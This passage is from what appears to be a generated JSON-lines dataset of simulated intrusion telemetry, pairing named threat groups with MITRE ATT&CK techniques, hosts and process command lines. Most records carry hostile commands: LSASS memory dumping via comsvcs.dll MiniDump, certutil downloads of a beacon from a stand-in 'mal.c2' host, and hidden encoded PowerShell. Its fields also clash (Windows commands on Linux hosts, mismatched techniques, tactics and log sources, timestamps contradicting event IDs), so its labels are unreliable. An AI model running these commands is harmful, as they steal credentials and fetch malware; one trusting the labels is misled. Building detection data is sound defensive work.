(DS0029)","timestamp":"2026-02-07T05:15:16.000Z","user":{"name":"arn:aws:iam::rne83gukt7dh","sid":"S-1-5-21-692147541-348379831-4120"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1071.001 using cloud-native technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Command and Control","Exfiltration"],"technique_id":"T1071.001"},"event_id":"evt_volttyphoon_20260629T110956000Z_0015697","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.71.134.216","name":"EC2-INST-ILMYDW161I","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15697Volt TyphoonT1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.151.154.171","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-02-14T08:48:11.000Z","user":{"name":"i-klhrp0nqpjrb","sid":"S-1-5-21-518776687-143285171-6071"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1071.001 using cloud-native technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Reconnaissance","Defense Evasion","Execution"],"technique_id":"T1071.001"},"event_id":"evt_apt29_20260811T123022000Z_0015699","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.226.63.204","name":"AZURE-VM-Q1GLRBK60J","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15699APT29T1071.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.73.25.239","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-10-03T18:51:05.000Z","user":{"name":"arn:aws:iam::2cz9tq36nteu","sid":"S-1-5-21-494705074-591608706-4329"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1484.001 using fileless technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Command and Control","Initial Access"],"technique_id":"T1484.001"},"event_id":"evt_apt41_20260427T234407000Z_0015701","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["WMI","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.95.231.189","name":"APP-WEB-YLRTZXGSVU","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15701APT41T1484.001"},"network":{"domain":"github.com","dst_ip":"1.6.167.190","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"powershell.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-08-28T15:11:02.000Z","user":{"name":"azuread\\hg0tzu2ixh7r","sid":"S-1-5-21-993402291-162135189-4790"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1098.004 using cloud-native technique.","sub_technique":"SSH Authorized Keys","tactic":["Reconnaissance","Privilege Escalation"],"technique_id":"T1098.004"},"event_id":"evt_fin7_20250305T143817000Z_0015703","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.120.91.46","name":"WIN-FIN-SRV-9WQUZDGFM5","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15703FIN7T1098.004"},"network":{"domain":"cdn-content.com","dst_ip":"1.152.7.36","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"wmic.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-02-13T09:03:47.000Z","user":{"name":"azuread\\gbi7np9ahico","sid":"S-1-5-21-221859731-895054558-9833"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1531 using LOLBin technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Initial Access","Collection"],"technique_id":"T1531"},"event_id":"evt_scatteredspider_20251217T173346000Z_0015705","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.233.247.80","name":"DB-ORACLE-AL81YRYKOO","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15705Scattered SpiderT1531"},"network":{"domain":"github.com","dst_ip":"1.178.85.157","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-09-14T21:35:44.000Z","user":{"name":"arn:aws:iam::54ypaar4g33x","sid":"S-1-5-21-592200813-676912567-2252"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1021.006 using fileless technique.","sub_technique":"Windows Remote Management","tactic":["Privilege Escalation","Initial Access","Credential Access"],"technique_id":"T1021.006"},"event_id":"evt_apt41_20250212T150309000Z_0015707","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["WMI","Base64","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.202.159.74","name":"EC2-INST-51T7DNRVH2","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15707APT41T1021.006"},"network":{"domain":"cdn-content.com","dst_ip":"1.150.192.79","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2550 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-12-12T14:08:03.000Z","user":{"name":"i-g5tskqq5r9hu","sid":"S-1-5-21-773550221-813844988-5346"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1531 using cloud-native technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Privilege Escalation","Exfiltration","Collection"],"technique_id":"T1531"},"event_id":"evt_volttyphoon_20260415T104235000Z_0015709","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.73.244.238","name":"DB-ORACLE-Z3WI30WMLB","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15709Volt TyphoonT1531"},"network":{"domain":"update.microsoft.com","dst_ip":"1.146.153.78","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2180 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-08-10T10:46:37.000Z","user":{"name":"arn:aws:iam::0sdfmt5fcsoj","sid":"S-1-5-21-931771949-691355758-7558"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1484.001 using fileless technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Discovery","Execution","Impact"],"technique_id":"T1484.001"},"event_id":"evt_scatteredspider_20260107T051914000Z_0015711","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.244.223.77","name":"WIN-FIN-SRV-MB3MBCA0XU","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15711Scattered SpiderT1484.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.51.186.137","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 718 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-02-15T11:08:47.000Z","user":{"name":"CORP\\ssf4t1ig1n7q","sid":"S-1-5-21-700959331-539119159-2605"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1098.004 using cloud-native technique.","sub_technique":"SSH Authorized Keys","tactic":["Command and Control","Initial Access"],"technique_id":"T1098.004"},"event_id":"evt_mustangpanda_20250212T094634000Z_0015713","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["LOLBin","Base64","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.2.212.5","name":"DB-ORACLE-FJUUO5I3YJ","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15713Mustang PandaT1098.004"},"network":{"domain":"cdn-content.com","dst_ip":"1.36.5.230","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-07-28T17:54:17.000Z","user":{"name":"i-k3guoncxgesh","sid":"S-1-5-21-789479585-499218760-5345"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Impact","Privilege Escalation","Exfiltration"],"technique_id":"T1003.001"},"event_id":"evt_fin7_20260829T225448000Z_0015715","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.87.94.29","name":"APP-WEB-O4TJED69NX","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15715FIN7T1003.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.135.136.185","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-12-30T05:26:51.000Z","user":{"name":"i-8lfu2f0r3mgo","sid":"S-1-5-21-945046734-406166684-4993"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1484.001 using fileless technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Initial Access","Discovery","Privilege Escalation"],"technique_id":"T1484.001"},"event_id":"evt_unc4841_20250214T070958000Z_0015717","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["WMI","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.118.154.235","name":"IAM-ROLE-DFDLTRNXCA","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15717UNC4841T1484.001"},"network":{"domain":"github.com","dst_ip":"1.194.64.229","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3946 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-05-11T04:04:08.000Z","user":{"name":"azuread\\lhap6psd8i5v","sid":"S-1-5-21-446375658-868903015-1042"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1484.001 using LOLBin technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Exfiltration","Execution","Lateral Movement"],"technique_id":"T1484.001"},"event_id":"evt_apt29_20250123T213436000Z_0015719","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.91.105.18","name":"EC2-INST-2TO3BYAOWC","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15719APT29T1484.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.184.227.242","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"powershell.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-11-16T07:05:27.000Z","user":{"name":"azuread\\c63edgdo6tgw","sid":"S-1-5-21-638242377-675625558-4063"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1531 using cloud-native technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Reconnaissance","Exfiltration"],"technique_id":"T1531"},"event_id":"evt_apt29_20261003T014919000Z_0015721","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.152.195.248","name":"AZURE-VM-Z1TMT697HP","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15721APT29T1531"},"network":{"domain":"github.com","dst_ip":"1.114.194.174","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-07-17T08:24:35.000Z","user":{"name":"CORP\\tw8pkfq1a428","sid":"S-1-5-21-527055038-336503599-3123"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1071.001 using cloud-native technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Discovery"],"technique_id":"T1071.001"},"event_id":"evt_scatteredspider_20260915T233351000Z_0015723","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.190.194.106","name":"AZURE-VM-6DVRW8Z0ON","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15723Scattered SpiderT1071.001"},"network":{"domain":"github.com","dst_ip":"1.126.94.186","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-06-26T10:04:20.000Z","user":{"name":"azuread\\6v6524gz00v6","sid":"S-1-5-21-202724431-142842815-2659"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1546.003 using encrypted C2 technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Initial Access","Execution"],"technique_id":"T1546.003"},"event_id":"evt_unc4841_20260226T095123000Z_0015725","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.171.55.17","name":"IAM-ROLE-SA2UG9HZUM","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15725UNC4841T1546.003"},"network":{"domain":"github.com","dst_ip":"1.84.15.105","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1368 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2026-10-06T09:54:05.000Z","user":{"name":"svc_15wlc59eilvh","sid":"S-1-5-21-884486576-179239719-3345"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1021.006 using fileless technique.","sub_technique":"Windows Remote Management","tactic":["Execution","Lateral Movement","Impact"],"technique_id":"T1021.006"},"event_id":"evt_mustangpanda_20260821T235551000Z_0015727","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Base64","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.144.233.165","name":"WIN-FIN-SRV-SIKR7NF4KA","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15727Mustang PandaT1021.006"},"network":{"domain":"cdn-content.com","dst_ip":"1.105.60.125","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-05-17T16:43:13.000Z","user":{"name":"arn:aws:iam::5wwwe44pfli0","sid":"S-1-5-21-881265180-547824132-6833"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1484.001 using LOLBin technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Initial Access","Privilege Escalation","Defense Evasion"],"technique_id":"T1484.001"},"event_id":"evt_lapsus_20250423T081305000Z_0015729","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.34.25.232","name":"IAM-ROLE-XYGHZ2C2LY","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15729Lapsus$T1484.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.67.105.241","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1659 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2026-02-26T09:04:54.000Z","user":{"name":"i-86e0hbqs0bq3","sid":"S-1-5-21-625700097-703583239-2351"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1484.001 using fileless technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Initial Access","Lateral Movement","Exfiltration"],"technique_id":"T1484.001"},"event_id":"evt_apt41_20251211T173752000Z_0015731","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.248.77.206","name":"APP-WEB-J6K5YARO5W","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15731APT41T1484.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.107.174.125","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-03-11T01:22:03.000Z","user":{"name":"azuread\\rwkc4s2slk83","sid":"S-1-5-21-895294971-310712560-7956"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1570 using LOLBin technique.","sub_technique":"Lateral Tool Transfer","tactic":["Defense Evasion","Reconnaissance","Privilege Escalation"],"technique_id":"T1570"},"event_id":"evt_volttyphoon_20250923T022331000Z_0015733","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.153.154.31","name":"APP-WEB-LW7RWY6WLG","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15733Volt TyphoonT1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.26.183.202","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-04-05T15:52:41.000Z","user":{"name":"i-69ne4lcdc139","sid":"S-1-5-21-970585705-454073350-5109"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1570 using encrypted C2 technique.","sub_technique":"Lateral Tool Transfer","tactic":["Credential Access","Persistence","Execution"],"technique_id":"T1570"},"event_id":"evt_fin7_20260504T015729000Z_0015735","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.73.72.115","name":"DB-ORACLE-FCAYOWEAAD","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15735FIN7T1570"},"network":{"domain":"cdn-content.com","dst_ip":"1.107.221.24","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2866 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2026-09-13T00:49:55.000Z","user":{"name":"svc_f99a0niv449t","sid":"S-1-5-21-208874138-219522349-5588"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1546.003 using cloud-native technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Lateral Movement","Defense Evasion","Persistence"],"technique_id":"T1546.003"},"event_id":"evt_volttyphoon_20250713T003039000Z_0015737","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.158.44.158","name":"AZURE-VM-LUSGBYUZRQ","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15737Volt TyphoonT1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.162.86.38","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3844 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-03-06T18:17:41.000Z","user":{"name":"azuread\\nex4ifalpecg","sid":"S-1-5-21-430979651-673335999-4020"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1531 using encrypted C2 technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Collection","Initial Access"],"technique_id":"T1531"},"event_id":"evt_apt29_20250119T055137000Z_0015739","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.101.186.136","name":"DB-ORACLE-95YFR52SXS","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15739APT29T1531"},"network":{"domain":"github.com","dst_ip":"1.51.252.46","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-02-15T14:05:10.000Z","user":{"name":"azuread\\9f1ox8s5ngcn","sid":"S-1-5-21-528041663-588947190-6950"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Lateral Movement","Initial Access"],"technique_id":"T1021.006"},"event_id":"evt_fin7_20260904T185934000Z_0015741","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.189.58.240","name":"AZURE-VM-NHDN4UVQZE","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15741FIN7T1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.6.72.130","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1713 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-09-30T15:34:31.000Z","user":{"name":"i-vjxkvapdqely","sid":"S-1-5-21-648126299-843818973-3512"}} |
